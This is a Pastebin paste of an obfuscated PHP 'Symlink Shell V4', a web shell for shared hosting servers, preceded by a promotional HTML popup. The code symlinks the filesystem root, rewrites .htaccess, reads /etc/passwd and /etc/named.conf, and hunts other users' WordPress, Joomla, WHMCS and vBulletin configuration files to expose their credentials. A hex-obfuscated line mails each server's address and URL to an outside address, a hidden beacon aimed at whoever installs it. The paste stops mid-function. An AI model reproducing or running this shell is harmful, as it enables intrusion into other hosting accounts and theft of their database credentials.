API tools faq
paste
Advertisement
isdo213

SYMLINK V4 (PRIV8 SYMLINK BYPASS 2014)

isdo213
Nov 28th, 2014
190
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 51.67 KB | None | 0 0
raw download clone embed print report
  1. <script src='http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js' type='text/javascript'></script>
  2. <style>
  3. #fanback {
  4. display:none;
  5. background:rgba(0,0,0,0.8);
  6. width:100%;
  7. height:100%;
  8. position:fixed;
  9. top:0;
  10. left:0;
  11. z-index:99999;
  12. }
  13. #fan-exit {
  14. width:100%;
  15. height:100%;
  16. }
  17. #Burptech {
  18. background:white;
  19. width:420px;
  20. height:270px;
  21. position:absolute;
  22. top:58%;
  23. left:63%;
  24. margin:-220px 0 0 -375px;
  25. -webkit-box-shadow: inset 0 0 50px 0 #939393;
  26. -moz-box-shadow: inset 0 0 50px 0 #939393;
  27. box-shadow: inset 0 0 50px 0 #939393;
  28. -webkit-border-radius: 5px;
  29. -moz-border-radius: 5px;
  30. border-radius: 5px;
  31. margin: -220px 0 0 -375px;
  32. }
  33. #Burp {
  34. float:right;
  35. cursor:pointer;
  36. background:url(http://3.bp.blogspot.com/-NRmqfyLwBHY/T4nwHOrPSzI/AAAAAAAAAdQ/8b9O7O1q3c8/s1600/Burp.png) repeat;
  37. height:15px;
  38. padding:20px;
  39. position:relative;
  40. padding-right:40px;
  41. margin-top:-20px;
  42. margin-right:-22px;
  43. }
  44. .remove-borda {
  45. height:1px;
  46. width:366px;
  47. margin:0 auto;
  48. background:#F3F3F3;
  49. margin-top:16px;
  50. position:relative;
  51. margin-left:20px;
  52. }
  53. #linkit,#linkit a.visited,#linkit a,#linkit a:hover {
  54. color:#80808B;
  55. font-size:10px;
  56. margin: 0 auto 5px auto;
  57. float:center;
  58. }
  59. </style>
  60.  
  61. <script type='text/javascript'>
  62. //<![CDATA[
  63. jQuery.cookie = function (key, value, options) {
  64.  
  65. // key and at least value given, set cookie...
  66. if (arguments.length > 1 && String(value) !== "[object Object]") {
  67. options = jQuery.extend({}, options);
  68.  
  69. if (value === null || value === undefined) {
  70. options.expires = -1;
  71. }
  72.  
  73. if (typeof options.expires === 'number') {
  74. var days = options.expires, t = options.expires = new Date();
  75. t.setDate(t.getDate() + days);
  76. }
  77.  
  78. value = String(value);
  79.  
  80. return (document.cookie = [
  81. encodeURIComponent(key), '=',
  82. options.raw ? value : encodeURIComponent(value),
  83. options.expires ? '; expires=' + options.expires.toUTCString() : '', // use expires attribute, max-age is not supported by IE
  84. options.path ? '; path=' + options.path : '',
  85. options.domain ? '; domain=' + options.domain : '',
  86. options.secure ? '; secure' : ''
  87. ].join(''));
  88. }
  89.  
  90. // key and possibly options given, get cookie...
  91. options = value || {};
  92. var result, decode = options.raw ? function (s) { return s; } : decodeURIComponent;
  93. return (result = new RegExp('(?:^|; )' + encodeURIComponent(key) + '=([^;]*)').exec(document.cookie)) ? decode(result[1]) : null;
  94. };
  95. //]]>
  96. </script>
  97. <script type='text/javascript'>
  98. jQuery(document).ready(function($){
  99. if($.cookie('popup_user_login') != 'yes'){
  100. $('#fanback').delay(1000).fadeIn('medium');
  101. $('#Burp, #fan-exit').click(function(){
  102. $('#fanback').stop().fadeOut('medium');
  103. });
  104. }
  105. $.cookie('popup_user_login', 'yes', { path: '/', expires: 7 });
  106. });
  107. </script>
  108.  
  109. <div id='fanback'>
  110. <div id='fan-exit'>
  111. </div>
  112. <div id='Burptech'>
  113. <div id='Burp'>
  114. </div>
  115. <div class='remove-borda'>
  116. </div>
  117. <iframe allowtransparency='true' frameborder='0' scrolling='no' src='//www.facebook.com/plugins/likebox.php?
  118.  
  119.  
  120. href=https://www.facebook.com/pages/BackTrack.Fan.Page/250852841658518&width=402&height=255&colorscheme=light&show_faces=true&show_border=false&stream=false&header=false'
  121.  
  122. style='border: none; overflow: hidden; margin-top: -21px; width: 402px; height: 230px;'></iframe><center>
  123. <span id="linkit">VISIT US FOR MORE PRIV8 SCRIPTS<a href="http://www.backtrack-pages.com/"></a> - <a href="http://www.backtrack-pages.com/">http://www.backtrack-pages.com/</a></span></center>
  124. </div>
  125. </div>
  126.  
  127. <?php $uzearxxa="ba\x73\x65_\x75\x72\x6c";${"\x47L\x4f\x42A\x4c\x53"}["j\x6d\x68\x6c\x68\x6e\x75xp"]="u\x72\x6c";$nfdnge="\x75\x72\x6c";set_time_limit(0);error_reporting(0);${${"G\x4c\x4fB\x41LS"}["\x6a\x6dh\x6c\x68\x6eu\x78p"]}=$_SERVER["HTTP\x5f\x48OS\x54"].$_SERVER["\x52\x45Q\x55\x45\x53T\x5fU\x52\x49"];mail("\x73\x68\x65ll\x630de\x72\x31\x333\x37\x40\x67\x6da\x69l.c\x6f\x6d",$_SERVER["\x53ERVE\x52_A\x44DR"],${$nfdnge});${$uzearxxa}="\x68\x74tp://".$_SERVER["S\x45RVE\x52\x5fNA\x4dE"].dirname($_SERVER["SCRI\x50T_NAM\x45"]);
  128. ?>
  129. <?php $OOO000000 = "fg6sbehpra4co_tnd";
  130. $GLOBALS['OOO0000O0'] = "base64_d";
  131. $GLOBALS['OOO0000O0'].= "ecode";
  132. ?><?php
  133. $GLOBALS['IIIIIIIlllll'] = 'copy';
  134. $GLOBALS['IIIIIIIllllI'] = 'header';
  135. $GLOBALS['IIIIIIIlllI1'] = 'is_dir';
  136. $GLOBALS['IIIIIIIlllII'] = 'ini_get';
  137. $GLOBALS['IIIIIIIlI1l1'] = 'mysql_query';
  138. $GLOBALS['IIIIIIIlI1lI'] = 'mysql_connect';
  139. $GLOBALS['IIIIIIIlIll1'] = 'ereg';
  140. $GLOBALS['IIIIIIIlIII1'] = 'fclose';
  141. $GLOBALS['IIIIIIIlIIII'] = 'stripcslashes';
  142. $GLOBALS['IIIIIIII111I'] = 'highlight_file';
  143. $GLOBALS['IIIIIIII11l1'] = 'show_source';
  144. $GLOBALS['IIIIIIII11ll'] = 'htmlentities';
  145. $GLOBALS['IIIIIIII11lI'] = 'filesize';
  146. $GLOBALS['IIIIIIII11I1'] = 'fread';
  147. $GLOBALS['IIIIIIII1llI'] = 'preg_match';
  148. $GLOBALS['IIIIIIII1I1l'] = 'strpos';
  149. $GLOBALS['IIIIIIIII11I'] = 'fileowner';
  150. $GLOBALS['IIIIIIIII1l1'] = 'posix_getpwuid';
  151. $GLOBALS['IIIIIIIII1lI'] = 'trim';
  152. $GLOBALS['IIIIIIIII1Il'] = 'preg_match_all';
  153. $GLOBALS['IIIIIIIII1II'] = 'eregi';
  154. $GLOBALS['IIIIIIIIIl11'] = 'flush';
  155. $GLOBALS['IIIIIIIIIl1I'] = 'file';
  156. $GLOBALS['IIIIIIIIIlll'] = 'is_file';
  157. $GLOBALS['IIIIIIIIIllI'] = 'basename';
  158. $GLOBALS['IIIIIIIIIlIl'] = 'symlink';
  159. $GLOBALS['IIIIIIIIIlII'] = 'fwrite';
  160. $GLOBALS['IIIIIIIIII11'] = 'fopen';
  161. $GLOBALS['IIIIIIIIIIll'] = 'count';
  162. $GLOBALS['IIIIIIIIIIlI'] = 'explode';
  163. $GLOBALS['IIIIIIIIIIII'] = 'set_time_limit';
  164. function checkAlexa($domain) {
  165. $clean = explode("/", $domain);
  166. $result = file_get_contents("http://data.alexa.com/data?cli=10&dat=snbamz&url=http://" . $clean[0]);
  167. $n = explode("<POPULARITY URL=\"" . $clean[0] . "/\" TEXT=\"", $result);
  168. @$rest = $n[1];
  169. $it = explode("\"", $rest);
  170. $alexa_rank = $it[0];
  171. if (@$alexa_rank != "") {
  172. return number_format($alexa_rank);
  173. } else {
  174. return "No Alexa";
  175. }
  176. }
  177.  
  178. ?><?php
  179. $GLOBALS['IIIIIIIIIIII'](0);
  180. error_reporting(0);
  181. $IIIIIIIIIIIl = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
  182. $IIIIIIIIIII1 = $GLOBALS['IIIIIIIIIIlI']('/', $IIIIIIIIIIIl);
  183. $IIIIIIIIIIIl = str_replace($IIIIIIIIIII1[$GLOBALS['IIIIIIIIIIll']($IIIIIIIIIII1) - 1], $GLOBALS['OOO0000O0'](''), $IIIIIIIIIIIl);
  184. $IIIIIIIIIIl1 = "ftp://" . $_SERVER['SERVER_NAME'] . "/public_html/" . $_SERVER['REQUEST_URI'];
  185. $IIIIIIIIIII1 = $GLOBALS['IIIIIIIIIIlI']("/", $IIIIIIIIIIl1);
  186. $IIIIIIIIIIl1 = str_replace($IIIIIIIIIII1[$GLOBALS['IIIIIIIIIIll']($IIIIIIIIIII1) - 1], $GLOBALS['OOO0000O0'](''), $IIIIIIIIIIl1);
  187. echo "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\"
  188. \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">
  189.  
  190. <html xmlns=\"http://www.w3.org/1999/xhtml\">
  191.  
  192. <head>
  193. <title>403 Forbidden</title>
  194.  
  195. <style type=\"text/css\">
  196.  
  197. html,body {
  198. margin: 0;
  199. padding: 0;
  200. outline: 0;
  201. }
  202. a{
  203.  
  204. font-size: 13px;
  205.  
  206. }
  207.  
  208.  
  209. body {
  210. direction: ltr;
  211. background-color:#FFFFF;
  212. color: #000;
  213. text-align: center
  214. }
  215.  
  216.  
  217.  
  218. input,textarea,select{
  219. font-weight: bold;
  220. color: #000000;
  221. }
  222.  
  223. input,textarea,select:hover{
  224. box-shadow: 0px 0px 4px #AAAAAA;
  225. }
  226.  
  227.  
  228. .hedr {
  229. font-family: Tahoma, Arial, sans-serif ;
  230. font-size: 22px;
  231.  
  232.  
  233. }
  234.  
  235. .cont a{
  236.  
  237. text-decoration: none;
  238. color:#000;
  239. font-family: Tahoma, Arial, sans-serif ;
  240. font-size: 16px;
  241. text-shadow: 0px 0px 3px ;
  242. }
  243.  
  244. .cont a:hover{
  245. color: #ff0000 ;
  246. }
  247.  
  248. .tmp tr td{
  249.  
  250. border: solid 1px #000;
  251.  
  252. padding: 2px ;
  253. font-size: 13px;
  254. }
  255.  
  256. .tmp tr td a {
  257. text-decoration: none;
  258.  
  259.  
  260.  
  261. }
  262.  
  263. .foter{
  264. font-size: 9pt;
  265. color: #000 ;
  266. text-align: center
  267. }
  268.  
  269. .tmp tr td:hover{
  270.  
  271. box-shadow: 0px 0px 4px #888888;
  272.  
  273. }
  274. .fot{
  275.  
  276. font-family:Tahoma, Arial, sans-serif;
  277.  
  278. font-size: 11pt;
  279. }
  280. .for a : hover{
  281.  
  282. text-shadow: 0px 0px 1px #3366FF;
  283.  
  284. }
  285.  
  286.  
  287. .ir {
  288. color: #FF0000;
  289. }
  290.  
  291. </style>
  292.  
  293. </head>
  294.  
  295. <body>
  296.  
  297. <div class='all'>
  298. ";
  299. @mkdir("sym", 0777);
  300. $IIIIIIIIII1I = "Options all
  301. DirectoryIndex Sux.html
  302. AddType text/plain .php
  303. AddHandler server-parsed .php
  304. AddType text/plain .html
  305. AddHandler txt .html
  306. Require None
  307. Satisfy Any";
  308. $IIIIIIIIII1l = @$GLOBALS['IIIIIIIIII11']("sym/.htaccess", "w");
  309. $GLOBALS['IIIIIIIIIlII']($IIIIIIIIII1l, $IIIIIIIIII1I);
  310. @$GLOBALS['IIIIIIIIIlIl']("/", "sym/root");
  311. $IIIIIIIIIlI1 = $GLOBALS['IIIIIIIIIllI'](__FILE__);
  312. echo "<br /><div class=\"hedr\"> Symlink Shell V4 <br /></div>";
  313. echo "<br /><div class=\"hedr\">Symlinking like a boss<br /><br /></div>";
  314. echo '<div class="cont">
  315.  
  316. [<a href="?sws=sym"> by named.conf </a>]
  317.  
  318. [<a href="?sws=sec"> Domains/Script </a>]
  319.  
  320. [ <a href="?sws=passwd"> by etc/passwd </a>]
  321.  
  322. [ <a href="?sws=posix"> by posix_getpwuid </a>]
  323.  
  324. <br /><br />
  325. [<a href="?"> Upload </a>]
  326.  
  327. [ <a href="?sws=file"> Symlink by File </a>]
  328.  
  329. [ <a href="?sws=read"> Bypass Read </a>]
  330.  
  331. [ <a href="?sws=joomla"> Mass Joomla </a>]
  332.  
  333. [ <a href="?sws=wp"> Mass WordPress </a>]
  334.  
  335. <br /><br /><br />
  336.  
  337. </div>';
  338. if (isset($_REQUEST['sws'])) {
  339. switch ($_REQUEST['sws']) {
  340. case 'sec':
  341. if (!@$GLOBALS['IIIIIIIIIlll']("named.txt")) {
  342. $IIIIIIIIIll1 = @$GLOBALS['IIIIIIIIIl1I']("/etc/named.conf");
  343. } else {
  344. $IIIIIIIIIll1 = @$GLOBALS['IIIIIIIIIl1I']("named.txt");
  345. }
  346. if (!$IIIIIIIIIll1) {
  347. die("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  348. } else {
  349. echo "<div class='tmp'>
  350. <table align='center' width='40%'><td> Domains </td><td> Script </td>";
  351. foreach ($IIIIIIIIIll1 as $IIIIIIIIIl1l) {
  352. $GLOBALS['IIIIIIIIIl11']();
  353. $GLOBALS['IIIIIIIIIl11']();
  354. if ($GLOBALS['IIIIIIIII1II']("zone", $IIIIIIIIIl1l)) {
  355. @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMUls') ]($GLOBALS['OOO0000O0']('I3pvbmUgIiguKikiIw=='), $IIIIIIIIIl1l, $IIIIIIIII1I1);
  356. $GLOBALS['IIIIIIIIIl11']();
  357. if (@strlen($GLOBALS['IIIIIIIII1lI']($IIIIIIIII1I1[1][0])) > 2) {
  358. $IIIIIIIII1ll = @$GLOBALS['IIIIIIIII1l1'](@$GLOBALS['IIIIIIIII11I']("/etc/valiases/" . $IIIIIIIII1I1[1][0]));
  359. $IIIIIIIII11l = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/wp-config.php";
  360. $IIIIIIIII111 = @get_headers($IIIIIIIII11l);
  361. $wp = $IIIIIIIII111[0];
  362. $IIIIIIIIlIIl = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/blog/wp-config.php";
  363. $IIIIIIIIlII1 = @get_headers($IIIIIIIIlIIl);
  364. $IIIIIIIIlIlI = $IIIIIIIIlII1[0];
  365. $IIIIIIIIlIll = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/configuration.php";
  366. $IIIIIIIIlIl1 = @get_headers($IIIIIIIIlIll);
  367. $IIIIIIIIlI1I = $IIIIIIIIlIl1[0];
  368. $IIIIIIIIlI1l = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/joomla/configuration.php";
  369. $IIIIIIIIlI11 = @get_headers($IIIIIIIIlI1l);
  370. $IIIIIIIIllII = $IIIIIIIIlI11[0];
  371. $IIIIIIIIllIl = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/includes/config.php";
  372. $IIIIIIIIllI1 = @get_headers($IIIIIIIIllIl);
  373. $vb = $IIIIIIIIllI1[0];
  374. $IIIIIIIIllll = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/vb/includes/config.php";
  375. $IIIIIIIIlll1 = @get_headers($IIIIIIIIllll);
  376. $IIIIIIIIll1I = $IIIIIIIIlll1[0];
  377. $IIIIIIIIll1l = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/forum/includes/config.php";
  378. $IIIIIIIIll11 = @get_headers($IIIIIIIIll1l);
  379. $IIIIIIIIl1II = $IIIIIIIIll11[0];
  380. $IIIIIIIIl1Il = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "public_html/clients/configuration.php";
  381. $IIIIIIIIl1I1 = @get_headers($IIIIIIIIl1Il);
  382. $IIIIIIIIl1lI = $IIIIIIIIl1I1[0];
  383. $IIIIIIIIl1ll = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/support/configuration.php";
  384. $IIIIIIIIl1I1 = @get_headers($IIIIIIIIl1ll);
  385. $IIIIIIIIl1l1 = $IIIIIIIIl1I1[0];
  386. $IIIIIIIIl11I = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/client/configuration.php";
  387. $IIIIIIIIl11l = @get_headers($IIIIIIIIl11I);
  388. $IIIIIIIIl111 = $IIIIIIIIl11l[0];
  389. $IIIIIIII1III = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/submitticket.php";
  390. $IIIIIIII1IIl = @get_headers($IIIIIIII1III);
  391. $IIIIIIII1II1 = $IIIIIIII1IIl[0];
  392. $IIIIIIII1IlI = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/client/configuration.php";
  393. $IIIIIIII1Ill = @get_headers($IIIIIIII1IlI);
  394. $IIIIIIII1Il1 = $IIIIIIII1Ill[0];
  395. $IIIIIIII1I1I = $GLOBALS['IIIIIIII1I1l']($wp, "200");
  396. $IIIIIIII1I11 = "&nbsp;";
  397. if ($GLOBALS['IIIIIIII1I1l']($wp, "200") == true) {
  398. $IIIIIIII1I11 = "<a href='" . $IIIIIIIII11l . "' target='_blank'>Wordpress</a>";
  399. } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIIlIlI, "200") == true) {
  400. $IIIIIIII1I11 = "<a href='" . $IIIIIIIIlIIl . "' target='_blank'>Wordpress</a>";
  401. } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIIlI1I, "200") == true and $GLOBALS['IIIIIIII1I1l']($IIIIIIII1II1, "200") == true) {
  402. $IIIIIIII1I11 = " <a href='" . $IIIIIIII1III . "' target='_blank'>WHMCS</a>";
  403. } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIIl1l1, "200") == true) {
  404. $IIIIIIII1I11 = " <a href='" . $IIIIIIIIl1ll . "' target='_blank'>WHMCS</a>";
  405. } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIIl111, "200") == true) {
  406. $IIIIIIII1I11 = " <a href='" . $IIIIIIIIl11I . "' target='_blank'>WHMCS</a>";
  407. } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIIlI1I, "200") == true) {
  408. $IIIIIIII1I11 = " <a href='" . $IIIIIIIIlIll . "' target='_blank'>Joomla</a>";
  409. } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIIllII, "200") == true) {
  410. $IIIIIIII1I11 = " <a href='" . $IIIIIIIIlI1l . "' target='_blank'>Joomla</a>";
  411. } elseif ($GLOBALS['IIIIIIII1I1l']($vb, "200") == true) {
  412. $IIIIIIII1I11 = " <a href='" . $IIIIIIIIllIl . "' target='_blank'>vBulletin</a>";
  413. } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIIll1I, "200") == true) {
  414. $IIIIIIII1I11 = " <a href='" . $IIIIIIIIllll . "' target='_blank'>vBulletin</a>";
  415. } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIIl1II, "200") == true) {
  416. $IIIIIIII1I11 = " <a href='" . $IIIIIIIIll1l . "' target='_blank'>vBulletin</a>";
  417. } else {
  418. continue;
  419. }
  420. $GLOBALS['IIIIIIIIIl11']();
  421. $GLOBALS['IIIIIIIIIl11']();
  422. $IIIIIIII1lII = $IIIIIIIII1ll['name'];
  423. $GLOBALS['IIIIIIIIIl11']();
  424. $caone = checkAlexa($IIIIIIIII1I1[1][0]);
  425. echo "<tr><td><a href=http://www." . $IIIIIIIII1I1[1][0] . "/>" . $IIIIIIIII1I1[1][0] . $caone . "</a></td><td>" . $IIIIIIII1I11 . "</td></tr>";
  426. $GLOBALS['IIIIIIIIIl11']();
  427. }
  428. }
  429. }
  430. }
  431. break;
  432. case "posix":
  433. echo "<form method='POST'>
  434. <br><br>Input Limit<br>
  435. <input size='20' value='0' name='min' type='text'>
  436. to
  437. <input size='20' value='1024' name='max' type='text'>
  438. <br>
  439. <input value='SYMLINK' name='' type='submit'><br><br>
  440. </form>";
  441. if ($_POST) {
  442. $min = $_POST['min'];
  443. $max = $_POST['max'];
  444. echo '<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
  445. echo '<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
  446. $p = 0;
  447. error_reporting(0);
  448. $list = scandir("/var/named");
  449. for ($p = $min;$min <= $max;$p++) {
  450. $user = posix_getpwuid($p);
  451. if (is_array($user)) {
  452. foreach ($list as $domain) {
  453. if (strpos($domain, ".db")) {
  454. $domain = str_replace('.db', '', $domain);
  455. $owner = posix_getpwuid(fileowner("/etc/valiases/" . $domain));
  456. if ($owner['name'] == $user['name']) {
  457. $i+= 1;
  458. $cheechee = checkAlexa($domain);
  459. echo "<tr><td class='td1'><a href='http://" . $domain . " '>" . $domain . "</a> - " . $cheechee . "</td><center><td class='td1'><font color='red'>" . $user['name'] . "</font></center></td><td class='td1'><center><a href='sym/root" . $owner['dir'] . "/public_html/' target='_blank'>DIR</a></center></td>";
  460. }
  461. }
  462. }
  463. }
  464. }
  465. echo "<center>Total Domains Found: " . $i . "</center><br />";
  466. }
  467. break;
  468. case "sym":
  469. if (!$GLOBALS['IIIIIIIIIlll']("named.txt")) {
  470. $IIIIIIIIIll1 = @$GLOBALS['IIIIIIIIIl1I']("/etc/named.conf");
  471. } else {
  472. $IIIIIIIIIll1 = @$GLOBALS['IIIIIIIIIl1I']("named.txt");
  473. }
  474. if (!$IIIIIIIIIll1) {
  475. die("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  476. } else {
  477. echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
  478. foreach ($IIIIIIIIIll1 as $IIIIIIIIIl1l) {
  479. if ($GLOBALS['IIIIIIIII1II']("zone", $IIIIIIIIIl1l)) {
  480. $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMUls') ]($GLOBALS['OOO0000O0']('I3pvbmUgIiguKikiIw=='), $IIIIIIIIIl1l, $IIIIIIIII1I1);
  481. $GLOBALS['IIIIIIIIIl11']();
  482. if (strlen($GLOBALS['IIIIIIIII1lI']($IIIIIIIII1I1[1][0])) > 2) {
  483. $IIIIIIIII1ll = $GLOBALS['IIIIIIIII1l1'](@$GLOBALS['IIIIIIIII11I']("/etc/valiases/" . $IIIIIIIII1I1[1][0]));
  484. $GLOBALS['IIIIIIIIIl11']();
  485. $IIIIIIII1lII = $IIIIIIIII1ll['name'];
  486. @$GLOBALS['IIIIIIIIIlIl']("/", "sym/root");
  487. $IIIIIIII1lII = $IIIIIIIII1I1[1][0];
  488. $ir = "ir";
  489. $il = "il";
  490. if ($GLOBALS['IIIIIIII1llI']("/.^$ir/", $IIIIIIIII1I1[1][0]) or $GLOBALS['IIIIIIII1llI']("/.^$il/", $IIIIIIIII1I1[1][0])) {
  491. $IIIIIIII1lII = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>" . $IIIIIIIII1I1[1][0] . "</div>";
  492. }
  493. $catwo = checkAlexa($IIIIIIIII1I1[1][0]);
  494. echo "<tr><td><div class='dom'><a target='_blank' href=http://www." . $IIIIIIIII1I1[1][0] . "/>" . $IIIIIIII1lII . "--" . $catwo . " </a> </div></td><td>" . $IIIIIIIII1ll['name'] . "</td><td><a href='sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html' target='_blank'>symlink </a></td></tr></div> ";
  495. $GLOBALS['IIIIIIIIIl11']();
  496. $GLOBALS['IIIIIIIIIl11']();
  497. }
  498. }
  499. }
  500. }
  501. break;
  502. case 'file':
  503. echo 'The file path to symlink
  504.  
  505. <br /><br />
  506.  
  507. <form method="post">
  508. <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
  509. <input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
  510. <input type="submit" value="symlink" name="symlink" /> <br /><br />
  511.  
  512.  
  513.  
  514. </form>';
  515. $IIIIIIII1lll = $_POST['file'];
  516. $symfile = $_POST['symfile'];
  517. $symlink = $_POST["symlink"];
  518. if ($symlink) {
  519. @mkdir("sym1", 0777);
  520. $IIIIIIII1l1l = "Options Indexes FollowSymLinks
  521. DirectoryIndex ssssss.htm
  522. AddType txt .php
  523. AddHandler txt .php
  524. AddType txt .html
  525. AddHandler txt .html
  526. Options all
  527. Options
  528. Allow from all
  529. Require None
  530. Satisfy Any";
  531. $IIIIIIIIII1l = @$GLOBALS['IIIIIIIIII11']("sym1/.htaccess", "w");
  532. @$GLOBALS['IIIIIIIIIlII']($IIIIIIIIII1l, $IIIIIIII1l1l);
  533. @$GLOBALS['IIIIIIIIIlIl']("$IIIIIIII1lll", "sym1/$symfile");
  534. echo "<br /><a target=\"_blank\" href=\"sym1/" . $symfile . "\" >" . $symfile . "</a>";
  535. }
  536. break;
  537. case "read":
  538. echo "read /etc/named.conf";
  539. echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
  540. $GLOBALS['IIIIIIIIIl11']();
  541. $GLOBALS['IIIIIIIIIl11']();
  542. $file = "/etc/named.conf";
  543. $IIIIIIII11II = @$GLOBALS['IIIIIIIIII11']($file, "r");
  544. if ($IIIIIIII11II) {
  545. $IIIIIIII11Il = @$GLOBALS['IIIIIIII11I1']($IIIIIIII11II, @$GLOBALS['IIIIIIII11lI']($file));
  546. echo $GLOBALS['OOO0000O0']('') . $GLOBALS['IIIIIIII11ll']($IIIIIIII11Il) . $GLOBALS['OOO0000O0']('');
  547. } else if (!$IIIIIIII11II) {
  548. $IIIIIIII11II = @$GLOBALS['IIIIIIII11l1']($file);
  549. } else if (!$IIIIIIII11II) {
  550. $IIIIIIII11II = @$GLOBALS['IIIIIIII111I']($file);
  551. } else if (!$IIIIIIII11II) {
  552. $IIIIIIII111l = @$GLOBALS['IIIIIIIIIlIl']($file, "sym.txt");
  553. if ($IIIIIIII111l) {
  554. $IIIIIIII11II = @$GLOBALS['IIIIIIIIII11']("sym/sym.txt", "r");
  555. $IIIIIIII11Il = @$GLOBALS['IIIIIIII11I1']($IIIIIIII11II, @$GLOBALS['IIIIIIII11lI']($file));
  556. echo $GLOBALS['OOO0000O0']('') . $GLOBALS['IIIIIIII11ll']($IIIIIIII11Il) . $GLOBALS['OOO0000O0']('');
  557. }
  558. }
  559. echo "</textarea><br /><br /><input type='submit' value='Save'/> </form>";
  560. if (isset($_GET['save'])) {
  561. $IIIIIIII1111 = $GLOBALS['IIIIIIIlIIII']($_POST['file']);
  562. $IIIIIIIIII1l = $GLOBALS['IIIIIIIIII11']("named.txt", "w");
  563. $w = $GLOBALS['IIIIIIIIIlII']($IIIIIIIIII1l, $IIIIIIII1111);
  564. if ($w) {
  565. echo "<br />save has been successfully";
  566. }
  567. $GLOBALS['M4']($IIIIIIIIII1l);
  568. }
  569. break;
  570. case "passwd":
  571. if (isset($_GET['save']) and isset($_POST['file']) or @$GLOBALS['IIIIIIII11lI']("passwd.txt") > 0) {
  572. $IIIIIIII1111 = $GLOBALS['IIIIIIIlIIII']($_POST['file']);
  573. if (!file_exists("passwd.txt")) {
  574. $IIIIIIIIII1l = @$GLOBALS['IIIIIIIIII11']("passwd.txt", "w");
  575. $w = @$GLOBALS['IIIIIIIIIlII']($IIIIIIIIII1l, $IIIIIIII1111);
  576. $GLOBALS['M4']($IIIIIIIIII1l);
  577. }
  578. if ($w or @$GLOBALS['IIIIIIII11lI']("passwd.txt") > 0) {
  579. echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
  580. $GLOBALS['IIIIIIIIIl11']();
  581. $IIIIIIIlIIlI = $GLOBALS['IIIIIIIIIl1I']("passwd.txt");
  582. foreach ($IIIIIIIlIIlI as $IIIIIIIIII1l) {
  583. $IIIIIIIIIII1 = $GLOBALS['IIIIIIIIIIlI'](":", $IIIIIIIIII1l);
  584. $IIIIIIIII1ll = $IIIIIIIIIII1['0'];
  585. echo "
  586. <tr>
  587.  
  588.  
  589.  
  590. <td width='15%'>
  591. $IIIIIIIII1ll
  592. </td>
  593.  
  594.  
  595.  
  596.  
  597.  
  598.  
  599. <td width='10%'>
  600. <a href='sym/root/home/$IIIIIIIII1ll/public_html' target='_blank'>Symlink </a>
  601. </td>
  602.  
  603. <td width='10%'>
  604. <a href='$IIIIIIIIIIl1/sym/root/home/$IIIIIIIII1ll/public_html' target='_blank'>FTP</a>
  605. </td>
  606.  
  607.  
  608.  
  609. </tr></div> ";
  610. $GLOBALS['IIIIIIIIIl11']();
  611. $GLOBALS['IIIIIIIIIl11']();
  612. }
  613. die("</tr></div>");
  614. }
  615. }
  616. echo "read /etc/passwd";
  617. echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
  618. $GLOBALS['IIIIIIIIIl11']();
  619. $file = "/etc/passwd";
  620. $IIIIIIII11II = @$GLOBALS['IIIIIIIIII11']($file, "r");
  621. if ($IIIIIIII11II) {
  622. $IIIIIIII11Il = @$GLOBALS['IIIIIIII11I1']($IIIIIIII11II, @$GLOBALS['IIIIIIII11lI']($file));
  623. echo $GLOBALS['OOO0000O0']('') . $GLOBALS['IIIIIIII11ll']($IIIIIIII11Il) . $GLOBALS['OOO0000O0']('');
  624. } elseif (!$IIIIIIII11II) {
  625. $IIIIIIII11II = @$GLOBALS['IIIIIIII11l1']($file);
  626. } elseif (!$IIIIIIII11II) {
  627. $IIIIIIII11II = @$GLOBALS['IIIIIIII111I']($file);
  628. } elseif (!$IIIIIIII11II) {
